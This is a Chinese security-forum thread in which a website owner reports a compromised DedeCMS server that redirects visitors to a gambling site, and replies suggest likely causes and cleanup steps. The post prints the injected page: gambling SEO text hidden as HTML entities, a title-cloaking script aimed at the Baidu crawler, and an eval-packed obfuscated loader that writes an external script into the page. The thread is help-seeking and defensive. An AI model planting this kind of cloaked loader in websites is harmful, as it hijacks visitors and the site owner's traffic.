吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4787|回复: 15
收起左侧

服务器莫名其妙的中病毒了

[复制链接]
Ono 发表于 2019-8-24 15:36
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
今天发现网站不对劲,浏览的时候跳到了一个赌博网站(我以为是浏览器的原因),接着返回继续浏览返现网站功能异常了。右击查看源码发现了以下代码(赌博棋牌的):

服务器》西部数码
环境》宝塔
程序》织梦

目前就发现html被篡改,php,数据库这些应该是没问题的(妈的,估计是有问题的)

我服务器也没干什么,怎么会中病毒了呢。

我下火绒杀了没用,重装程序然后过一两天又出现了。(真是日了狗)


<!DOCTYPE html >
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>&#26368;&#28779;&#29616;&#37329;&#26827;&#29260;&#25429;&#40060;&#23448;&#32593;&#95;&#29616;&#37329;&#26827;&#29260;&#22823;&#20840;</title>
<meta name="keywords" content="&#29616;&#37329;&#26827;&#29260;&#32;&#26368;&#28779;&#29616;&#37329;&#26827;&#29260;"/>
<meta name="description" content="&#50;&#48;&#49;&#57;&#26368;&#28779;&#29616;&#37329;&#26827;&#29260;&#23448;&#32593;&#40;&#119;&#119;&#119;&#46;&#48;&#49;&#48;&#49;&#48;&#46;&#99;&#111;&#109;&#32;&#35802;&#25307;&#20195;&#29702;&#21830;&#81;&#81;&#58;&#57;&#54;&#56;&#49;&#50;&#51;&#41;&#65292;&#26827;&#29260;&#28216;&#25103;&#21487;&#20197;&#25552;&#29616;&#30340;&#65292;&#25163;&#26426;&#26827;&#29260;&#28216;&#25103;&#25442;&#29616;&#37329;&#12290;&#29616;&#37329;&#26827;&#29260;&#26159;&#26102;&#19979;&#26368;&#21463;&#27426;&#36814;&#30340;&#19968;&#27454;&#26827;&#29260;&#28216;&#25103;&#65292;&#36825;&#31867;&#26827;&#29260;&#28216;&#25103;&#30456;&#27604;&#20256;&#32479;&#30340;&#26827;&#29260;&#29609;&#27861;&#26356;&#21152;&#26032;&#39062;&#26377;&#36259;&#65292;&#19968;&#27604;&#19968;&#30340;&#29616;&#37329;&#23545;&#25112;&#65292;&#33719;&#32988;&#21363;&#21487;&#33719;&#24471;&#31561;&#27604;&#20363;&#30340;&#29616;&#37329;&#22870;&#21169;&#65292;&#33719;&#24471;&#30340;&#29616;&#37329;&#21487;&#20197;&#38543;&#26102;&#25552;&#29616;&#65292;&#29609;&#28216;&#25103;&#36824;&#33021;&#36186;&#38065;&#65292;"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('n["\\9\\f\\2\\e\\j\\7\\m\\0"]["\\o\\4\\8\\0\\7"](\'\\k\\1\\2\\4\\8\\3\\0 \\0\\l\\3\\7\\d\\6\\0\\7\\s\\0\\5\\i\\b\\t\\b\\1\\2\\4\\8\\3\\0\\6 \\1\\4\\2\\d\\6\\a\\0\\0\\3\\1\\p\\5\\5\\1\\c\\a\\e\\c\\a\\r\\g\\2\\f\\j\\5\\9\\9\\q\\3\\g\\i\\1\\6\\h\\k\\5\\1\\2\\4\\8\\3\\0\\h\');',30,30,'x74|x73|x63|x70|x72|x2f|x22|x65|x69|x64|x68|x61|x66|x3d|x75|x6f|x2e|x3e|x6a|x6d|x3c|x79|x6e|window|x77|x3a|x71|x32|x78|x76'.split('|'),0,{}))
</script>

免费评分

参与人数 1吾爱币 +2 热心值 +1 收起 理由
sxlixiaoyang + 2 + 1 我,赵公子,今天赌0.1RMB是织梦的锅!~~~~

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

w2010d 发表于 2019-8-24 19:50
可能存在的问题如下:
1.使用的织梦存在漏洞未修复。
2.建站源码存在后门。
3.服务器被提权。

下图是解密js以及跳转的链接,简单来说就是做的劫持引流菠菜SEO
1.png

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
Ono + 1 + 1 谢谢,我已经找服务器商进行处理

查看全部评分

爱在何方 发表于 2019-8-24 15:53
lyt0526 发表于 2019-8-24 15:58
我最近也是各种被篡改,22号上了一个安全狗,目前看来没什么问题。
小言u 发表于 2019-8-24 15:58
你这源码是不是自己带着后门?仔细检查一下未安装时的源码?
lyt0526 发表于 2019-8-24 15:59
而且你这个代码我没看出来是哪里的问题
大笨牛牛 发表于 2019-8-24 16:11
用别人的源码是会出现这种问题。源码有漏洞。
nohack_pojie 发表于 2019-8-24 16:12
网站有漏洞,下载一个服务器漏洞扫描软件,看看有没有什么漏洞。
king82 发表于 2019-8-24 16:25
nohack_pojie 发表于 2019-8-24 16:12
网站有漏洞,下载一个服务器漏洞扫描软件,看看有没有什么漏洞。

推荐一个来看看?
头像被屏蔽
pang533026524 发表于 2019-8-24 16:27
提示: 作者被禁止或删除 内容自动屏蔽
gardener 发表于 2019-8-24 16:34
比对一下源码的修改日期
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 21:08

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表